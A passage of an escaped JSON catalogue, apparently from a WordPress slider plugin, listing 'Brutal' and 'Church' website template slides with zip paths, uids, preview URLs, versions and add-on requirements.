class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Corporate Website\",\"package_order\":\"19\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"29\",\"installed\":false},\"358\":{\"id\":\"403\",\"title\":\"Brutal Menu\",\"alias\":\"brutal-menu\",\"zip\":\"packs\\/brutal-menu.zip\",\"uid\":\"04b21c7aee2479793336e964230d6e3f\",\"img\":\"brutal-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/brutal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=brutal-website-template\",\"version\":\"1.0.2\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Brutal Website Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Scroll-Triggered About Me Section for the Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-scroll-triggered-about-me-section-for-the-home-page\\/\",\"guide_img\":\"tutorial\\/Brutal-Website.png\",\"active\":\"1\",\"package_id\":\"31\",\"installed\":false},\"359\":{\"id\":\"404\",\"title\":\"Brutal Hero\",\"alias\":\"brutal-hero\",\"zip\":\"packs\\/brutal-hero.zip\",\"uid\":\"a342ad01054b97bac7980fdf9e275b34\",\"img\":\"brutal-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/brutal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=brutal-website-template\",\"version\":\"1.0.2\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Brutal Website Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Scroll-Triggered About Me Section for the Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-scroll-triggered-about-me-section-for-the-home-page\\/\",\"guide_img\":\"tutorial\\/Brutal-Website.png\",\"active\":\"1\",\"package_id\":\"31\",\"installed\":false},\"360\":{\"id\":\"405\",\"title\":\"Brutal About\",\"alias\":\"brutal-about\",\"zip\":\"packs\\/brutal-about.zip\",\"uid\":\"a3e1cd2e36c9a783c1932fdafe2e4434\",\"img\":\"brutal-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/brutal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=brutal-website-template\",\"version\":\"1.0.2\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Brutal Website Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Scroll-Triggered About Me Section for the Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-scroll-triggered-about-me-section-for-the-home-page\\/\",\"guide_img\":\"tutorial\\/Brutal-Website.png\",\"active\":\"1\",\"package_id\":\"31\",\"installed\":false},\"361\":{\"id\":\"406\",\"title\":\"Brutal Highlight\",\"alias\":\"brutal-highlight\",\"zip\":\"packs\\/brutal-highlight.zip\",\"uid\":\"b7f8522dcb4636467633bd3b14f4e3e9\",\"img\":\"brutal-highlight\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/brutal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=brutal-website-template\",\"version\":\"1.0.2\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Brutal Website Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Scroll-Triggered About Me Section for the Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-scroll-triggered-about-me-section-for-the-home-page\\/\",\"guide_img\":\"tutorial\\/Brutal-Website.png\",\"active\":\"1\",\"package_id\":\"31\",\"installed\":false},\"362\":{\"id\":\"407\",\"title\":\"Brutal Projects\",\"alias\":\"brutal-projects\",\"zip\":\"packs\\/brutal-projects.zip\",\"uid\":\"1a462e91373042193ca5d623dd8e8a47\",\"img\":\"brutal-projects\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/brutal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=brutal-website-template\",\"version\":\"1.0.2\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Brutal Website Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Scroll-Triggered About Me Section for the Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-scroll-triggered-about-me-section-for-the-home-page\\/\",\"guide_img\":\"tutorial\\/Brutal-Website.png\",\"active\":\"1\",\"package_id\":\"31\",\"installed\":false},\"363\":{\"id\":\"408\",\"title\":\"Brutal Services\",\"alias\":\"brutal-services\",\"zip\":\"packs\\/brutal-services.zip\",\"uid\":\"cbeeb1e7a5c2842b155fe13acb7c165d\",\"img\":\"brutal-services\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/brutal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=brutal-website-template\",\"version\":\"1.0.2\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Brutal Website Template\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Scroll-Triggered About Me Section for the Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-scroll-triggered-about-me-section-for-the-home-page\\/\",\"guide_img\":\"tutorial\\/Brutal-Website.png\",\"active\":\"1\",\"package_id\":\"31\",\"installed\":false},\"364\":{\"id\":\"409\",\"title\":\"Brutal Callout\",\"alias\":\"brutal-callout\",\"zip\":\"packs\\/brutal-callout.zip\",\"uid\":\"31b6dafdb2dfb548152653e60df5a3bc\",\"img\":\"brutal-callout\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/brutal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=brutal-website-template\",\"version\":\"1.0.2\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Brutal Website Template\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Scroll-Triggered About Me Section for the Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-scroll-triggered-about-me-section-for-the-home-page\\/\",\"guide_img\":\"tutorial\\/Brutal-Website.png\",\"active\":\"1\",\"package_id\":\"31\",\"installed\":false},\"365\":{\"id\":\"410\",\"title\":\"Brutal Footer\",\"alias\":\"brutal-footer\",\"zip\":\"packs\\/brutal-footer.zip\",\"uid\":\"07559f0c574e3dd95b2d40d72cbb01bc\",\"img\":\"brutal-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/brutal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=brutal-website-template\",\"version\":\"1.0.2\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Brutal Website Template\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Scroll-Triggered About Me Section for the Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-scroll-triggered-about-me-section-for-the-home-page\\/\",\"guide_img\":\"tutorial\\/Brutal-Website.png\",\"active\":\"1\",\"package_id\":\"31\",\"installed\":false},\"366\":{\"id\":\"411\",\"title\":\"Church Website Template\",\"alias\":\"church-website-template\",\"zip\":\"\",\"uid\":\"church-website-template-package\",\"img\":\"packages\\/church-website-template.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-dark\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-dark\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Website Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"32\",\"installed\":false},\"367\":{\"id\":\"412\",\"title\":\"Church Header\",\"alias\":\"Church-Header\",\"zip\":\"packs\\/Church-Header.zip\",\"uid\":\"c14289117e1e2b9ee716fb99146b2e03\",\"img\":\"Church-Header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-dark\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-dark\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Website Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"32\",\"installed\":false},\"368\":{\"id\":\"413\",\"title\":\"Church Upcoming Events\",\"alias\":\"Church-Upcoming-Events\",\"zip\":\"packs\\/Church-Upcoming-Events.zip\",\"uid\":\"056a26efddae92973fee4ee5cfa75f10\",\"img\":\"Church-Upcoming-Events\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-dark\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-dark\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Website Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"32\",\"installed\":false},\"369\":{\"id\":\"414\",\"title\":\"Church About\",\"alias\":\"Church-About\",\"zip\":\"packs\\/Church-About.zip\",\"uid\":\"8ef133f3f669f06380334a83e27eedbb\",\"img\":\"Church-About\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-dark\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-dark\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Website Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"32\",\"installed\":false},\"370\":{\"id\":\"415\",\"title\":\"Church Pastors\",\"alias\":\"Church-Pastors\",\"zip\":\"packs\\/Church-Pastors.zip\",\"uid\":\"715edc0833a753b72350b8c974f86f94\",\"img\":\"Church-Pastors\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-dark\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-dark\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Website Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"32\",\"installed\":false},\"371\":{\"id\":\"416\",\"title\":\"Church Photo Gallery\",\"alias\":\"Church-Photo-Gallery\",\"zip\":\"packs\\/Church-Photo-Gallery.zip\",\"uid\":\"d94808a97149cd5d3b3354a28409ffd7\",\"img\":\"Church-Photo-Gallery\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-dark\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-dark\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Website Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"32\",\"installed\":false},\"372\":{\"id\":\"417\",\"title\":\"Church Community\",\"alias\":\"Church-Community\",\"zip\":\"packs\\/Church-Community.zip\",\"uid\":\"2244e6a6d7a691653eae2d70765130a7\",\"img\":\"Church-Community\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-dark\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-dark\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Website Template\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"32\",\"installed\":false},\"373\":{\"id\":\"418\",\"title\":\"Church Sermon\",\"alias\":\"Church-Sermon\",\"zip\":\"packs\\/Church-Sermon.zip\",\"uid\":\"8fedf983bd55fff0f7a16d9f0a7e5408\",\"img\":\"Church-Sermon\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-dark\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-dark\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Website Template\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"32\",\"installed\":false},\"374\":{\"id\":\"419\",\"title\":\"Church Contacts\",\"alias\":\"Church-Contacts\",\"zip\":\"packs\\/Church-Contacts.zip\",\"uid\":\"0b1a6968e75868548fd98e435625c090\",\"img\":\"Church-Contacts\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-dark\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-dark\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Website Template\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"32\",\"installed\":false},\"375\":{\"id\":\"420\",\"title\":\"Church Footer\",\"alias\":\"Church-Footer\",\"zip\":\"packs\\/Church-Footer.zip\",\"uid\":\"29756685d3dc49e42edada43e6393b7b\",\"img\":\"Church-Footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-dark\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-dark\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Website Template\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"32\",\"installed\":false},\"376\":{\"id\":\"421\",\"title\":\"Church Light Website Template\",\"alias\":\"church-light-website-template\",\"zip\":\"\",\"uid\":\"church-light-website-template-package\",\"img\":\"packages\\/church-light-website-template.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-light\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-light\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Light Website Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"33\",\"installed\":false},\"377\":{\"id\":\"422\",\"title\":\"Church Light Header\",\"alias\":\"Church-Light-Header\",\"zip\":\"packs\\/Church-Light-Header.zip\",\"uid\":\"81c00f4b52cf55214de919e3f13121fc\",\"img\":\"Church-Light-Header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-light\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-light\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Light Website Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"33\",\"installed\":false},\"378\":{\"id\":\"423\",\"title\":\"Church Light Upcoming Events\",\"alias\":\"Church-Light-Upcoming-Events\",\"zip\":\"packs\\/Church-Light-Upcoming-Events.zip\",\"uid\":\"963a49f4be0557ac5f3ee61d256f5bda\",\"img\":\"Church-Light-Upcoming-Events\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-light\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-light\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Light Website Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"33\",\"installed\":false},\"379\":{\"id\":\"424\",\"title\":\"Church Light About\",\"alias\":\"Church-Light-About\",\"zip\":\"packs\\/Church-Light-About.zip\",\"uid\":\"d46c8e8e6f80e6bfedb54f1cdc49e7e6\",\"img\":\"Church-Light-About\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-light\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-light\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Light Website Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"33\",\"installed\":false},\"380\":{\"id\":\"425\",\"title\":\"Church Light Pastors\",\"alias\":\"Church-Light-Pastors\",\"zip\":\"packs\\/Church-Light-Pastors.zip\",\"uid\":\"7cc3dec61556e2291d6f38c1ea5e983f\",\"img\":\"Church-Light-Pastors\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-light\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-light\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Light Website Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"33\",\"installed\":false},\"381\":{\"id\":\"426\",\"title\":\"Church Light Photo Gallery\",\"alias\":\"Church-Light-Photo-Gallery\",\"zip\":\"packs\\/Church-Light-Photo-Gallery.zip\",\"uid\":\"9e13100179b9b700b005693eeca57902\",\"img\":\"Church-Light-Photo-Gallery\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-light\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-light\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Light Website Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"33\",\"installed\":false},\"382\":{\"id\":\"427\",\"title\":\"Church Light 